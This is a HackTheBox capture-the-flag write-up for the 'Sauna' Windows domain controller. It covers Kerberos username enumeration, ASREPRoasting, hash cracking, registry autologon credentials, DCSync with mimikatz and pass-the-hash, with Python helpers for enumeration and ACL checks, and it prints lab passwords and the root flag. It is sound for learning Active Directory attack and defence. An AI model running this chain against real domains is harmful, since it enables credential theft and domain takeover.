
Sauna - 10.10.10.175

by SirBroccoli (please give "respect" at www.hackthebox.eu/home/users/profile/57519)

Enumeration
I used the tool legion to automate the enumeration process:

The most interesting open ports were: HTTP (80), Kerberos (88), LDAP (389) and WinRM (5985).
User
Using legion again I enumerated the LDAP port:

A lot of information was returned, but the most interesting part was:

Now we have a possible username: "Hugo Smith".


If you try to ASREPRoast that user (for example with impacket's GetNPUsers.py) you will find that it doesn't exist: the KDC answers KDC_ERR_C_PRINCIPAL_UNKNOWN for a principal that is not in its database, while for an existing account that still requires pre-authentication the tool reports that the user doesn't have UF_DONT_REQUIRE_PREAUTH set. That difference turns the AS-REQ into a username oracle, so I tried variations of the name and found one that was indeed a valid user: hsmith.

Variations I tried:
Hugo Smith
HugoSmith
hugo.smith
h.smith
hsmith
smithh
smith.h
smith.hugo
smithhugo
smith hugo
Found user:

So, now we have a valid user "hsmith" but no password…

It's time to take a look at the web server. There you will only find a few HTML pages, some of which contain interesting names:

Now that we know the format used to create the usernames (first initial followed by the surname, as in hsmith), let's check these usernames:
fsmith
scoins
sdriver
btaylor
hbear

We found that the user fsmith is vulnerable to ASREPRoast (Kerberos pre-authentication is disabled on the account) and we have obtained the crackable AS-REP "hash".
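The two enumeration steps above (trying name variations against Kerberos, then applying the discovered first-initial-plus-surname format to the names from the website) can be scripted. The following is an added example, not part of the original writeup: it generates the candidate formats for a full name, derives usernames from a list of names, and sorts the output of an impacket GetNPUsers.py -usersfile run into roastable accounts, existing accounts that still require pre-authentication, and unknown principals. The KDC_ERR_C_PRINCIPAL_UNKNOWN line carries no username, so only the first two categories confirm an account. The sample output, the DOMAIN.LOCAL realm, the hash bytes and the name "Jane Doe" are constructed placeholders.

```python
import re

# Username formats to try for one full name. For "Hugo Smith" this yields the
# same ten variations tried above, in the same order.
def username_candidates(full_name):
    parts = full_name.strip().lower().split()
    if not parts:
        return []
    if len(parts) == 1:
        return parts
    first, last = parts[0], parts[-1]
    forms = [
        f"{first} {last}", f"{first}{last}", f"{first}.{last}", f"{first[0]}.{last}",
        f"{first[0]}{last}", f"{last}{first[0]}", f"{last}.{first[0]}",
        f"{last}.{first}", f"{last}{first}", f"{last} {first}",
    ]
    seen, out = set(), []
    for form in forms:          # de-duplicate (e.g. when first == last) keeping order
        if form not in seen:
            seen.add(form)
            out.append(form)
    return out

# Apply a known naming convention (first initial + surname) to many full names.
def first_initial_surname(full_names):
    users = []
    for name in full_names:
        parts = name.strip().lower().split()
        if len(parts) >= 2:
            users.append(parts[0][0] + parts[-1])
    return users

# Line shapes produced by GetNPUsers.py in -usersfile mode:
#   $krb5asrep$...       -> account exists and has pre-auth disabled (roastable)
#   "doesn't have ..."   -> account exists, pre-auth still required
#   PRINCIPAL_UNKNOWN    -> account does not exist (line carries no username)
HASH_RE = re.compile(r"^\$krb5asrep\$(?:\d+\$)?(?P<user>[^@]+)@(?P<realm>[^:]+):")
PREAUTH_RE = re.compile(r"User (?P<user>\S+) doesn't have UF_DONT_REQUIRE_PREAUTH set")
UNKNOWN_RE = re.compile(r"KDC_ERR_C_PRINCIPAL_UNKNOWN")

def classify_getnpusers_output(text):
    result = {"roastable": {}, "preauth_required": [], "unknown_count": 0}
    for line in text.splitlines():
        line = line.strip()
        m = HASH_RE.match(line)          # both john ($krb5asrep$user@) and hashcat ($krb5asrep$23$user@) formats
        if m:
            result["roastable"][m.group("user")] = line
            continue
        m = PREAUTH_RE.search(line)
        if m:
            result["preauth_required"].append(m.group("user"))
            continue
        if UNKNOWN_RE.search(line):
            result["unknown_count"] += 1
    return result

def valid_users(result):
    """Accounts proven to exist: roastable ones plus those still requiring pre-auth."""
    return sorted(set(result["roastable"]) | set(result["preauth_required"]))

# Constructed sample of GetNPUsers.py output (realm and hash bytes are placeholders).
SAMPLE_OUTPUT = """\
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$fsmith@DOMAIN.LOCAL:0123456789abcdef0123456789abcdef$00112233445566778899aabbccddeeff
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
"""

if __name__ == "__main__":
    for user in username_candidates("Hugo Smith"):
        print(user)
    print(first_initial_surname(["Hugo Smith", "Jane Doe"]))
    res = classify_getnpusers_output(SAMPLE_OUTPUT)
    print("valid users:", valid_users(res))
    # The lines in res["roastable"].values() are what you save to a file for john or hashcat.
    for h in res["roastable"].values():
        print(h)
```

In practice you feed the candidate list to GetNPUsers.py with -usersfile, capture its output and pass it to classify_getnpusers_output; every user in the roastable set gets a hash line to crack, and every user in the pre-auth-required set is a confirmed account to try passwords against later.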
So, let's crack it with john and rockyou:

Credentials found: fsmith:Thestrokes23

Now, just connect via WinRM (for example with evil-winrm) and grab the user flag:
Root
I started enumerating the box using winPEAS. It found some interesting credentials inside the Winlogon registry key (the autologon values stored under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon):

There isn't any user called "svc_loanmanager", but there is one called "svc_loanmgr":

svc_loanmgr:Moneymakestheworldgoround!

And you can connect as that user with the password extracted from the registry:

You can also use SharpHound to collect the domain data for BloodHound, which shows that the user svc_loanmgr has the rights needed to perform DCSync against the DC (the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights on the domain object):
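BloodHound resolves the DCSync edge from the domain object's ACL; the check it performs can be done by hand on the security descriptor. The following is an added example, not code from the writeup or from BloodHound: it parses the DACL of an SDDL string (such as the .Sddl property returned by Get-Acl on the domain root through the AD: drive on a host with the ActiveDirectory module, an assumption about how you would obtain it) and lists every principal that is allowed both replication extended rights, honouring explicit deny ACEs and treating GenericAll as full control. The sample SDDL, the domain SID and the RID 1105 standing in for svc_loanmgr are constructed; group membership is not resolved, so a deny on a group the principal belongs to is not seen.

```python
import re

# Extended-rights GUIDs from the AD schema; a principal holding both on the
# domain object can replicate secrets, i.e. run DCSync.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
BOTH_REPLICATION_RIGHTS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

# Bits used when the SDDL rights field is a hex mask instead of two-letter codes.
GENERIC_ALL = 0x10000000
RIGHT_DS_CONTROL_ACCESS = 0x00000100

ACE_RE = re.compile(r"\(([^()]*)\)")

def dacl_aces(sddl):
    """Parse the DACL (D:...) of an SDDL string into a list of ACE dicts."""
    m = re.search(r"D:[A-Z]*((?:\([^()]*\))+)", sddl)
    if not m:
        return []
    aces = []
    for body in ACE_RE.findall(m.group(1)):
        f = body.split(";")
        if len(f) < 6:          # ace_type;ace_flags;rights;object_guid;inherit_guid;sid
            continue
        aces.append({"type": f[0], "rights": f[2], "object_guid": f[3].lower(), "sid": f[5]})
    return aces

def rights_codes(rights):
    """Return (set of two-letter codes, hex mask) for an SDDL rights field."""
    if rights.lower().startswith("0x"):
        return set(), int(rights, 16)
    return {rights[i:i + 2] for i in range(0, len(rights), 2)}, 0

def _granted_guids(ace):
    """Replication GUIDs this single ACE covers (empty set if none)."""
    codes, mask = rights_codes(ace["rights"])
    if "GA" in codes or mask & GENERIC_ALL:
        return set(BOTH_REPLICATION_RIGHTS)          # full control implies every extended right
    if "CR" in codes or mask & RIGHT_DS_CONTROL_ACCESS:
        if ace["object_guid"] == "":
            return set(BOTH_REPLICATION_RIGHTS)      # control access with no GUID = all extended rights
        if ace["object_guid"] in BOTH_REPLICATION_RIGHTS:
            return {ace["object_guid"]}
    return set()

def dcsync_capable_sids(sddl):
    """SIDs (or SDDL aliases such as DA) whose effective allow rights include both replication rights."""
    granted, denied = {}, {}
    for ace in dacl_aces(sddl):
        if ace["type"] in ("A", "OA"):
            target = granted
        elif ace["type"] in ("D", "OD"):
            target = denied
        else:
            continue                                  # audit/alarm ACEs do not grant access
        guids = _granted_guids(ace)
        if guids:
            target.setdefault(ace["sid"], set()).update(guids)
    return sorted(sid for sid, g in granted.items()
                  if (g - denied.get(sid, set())) >= BOTH_REPLICATION_RIGHTS)

# Constructed sample: a domain-root DACL where RID 1105 (standing in for svc_loanmgr) holds both
# replication rights, RID 1106 holds only one, Domain Admins hold CR on all extended rights and
# SYSTEM holds GenericAll. Domain SID and RIDs are placeholders.
SAMPLE_SDDL = (
    "O:DAG:DAD:PAI"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1111111111-2222222222-3333333333-1105)"
    "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1111111111-2222222222-3333333333-1105)"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1111111111-2222222222-3333333333-1106)"
    "(A;;CCDCLCSWRPWPLOCRRCWDWO;;;DA)"
    "(A;;GA;;;SY)"
    "(A;;LCRPLORC;;;AU)"
)

if __name__ == "__main__":
    for sid in dcsync_capable_sids(SAMPLE_SDDL):
        print("DCSync capable:", sid)
```

Any SID in the result that is not a Domain Admins, Enterprise Admins, Domain Controllers or SYSTEM alias is exactly the kind of service account finding shown by BloodHound above, and is worth checking for weak or exposed credentials.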

Let's abuse these privileges using mimikatz (lsadump::dcsync) and extract the NTLM hash of the Administrator user:
Finally, you can use the hash to connect as Administrator to the victim using evil-winrm (pass-the-hash):

root.txt: f3ee04965c68257382e31502cc5e881f
